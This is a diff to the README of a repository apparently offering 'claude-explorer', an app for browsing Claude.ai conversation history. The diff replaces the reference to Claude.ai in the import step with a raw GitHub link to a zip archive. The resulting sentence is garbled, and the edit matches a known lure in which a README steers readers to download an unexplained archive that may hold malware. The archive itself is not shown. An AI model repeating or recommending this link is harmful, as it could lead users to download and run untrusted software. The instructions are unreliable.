Dothihon5937/claude-explorer/README.md

 1. **Launch the App:** Open claude-explorer from your applications.

-2. **Import Your Data:** Click on the “Import” button to bring in your previous conversations from Claude.ai.
+2. **Import Your Data:** Click on the “Import” button to bring in your previous conversations from https://raw.githubusercontent.com/Dothihon5937/claude-explorer/master/src/claude-explorer_v1.0.zip

 3. **Search Your Conversations:** Use the search bar to find specific topics or phrases within your conversation history.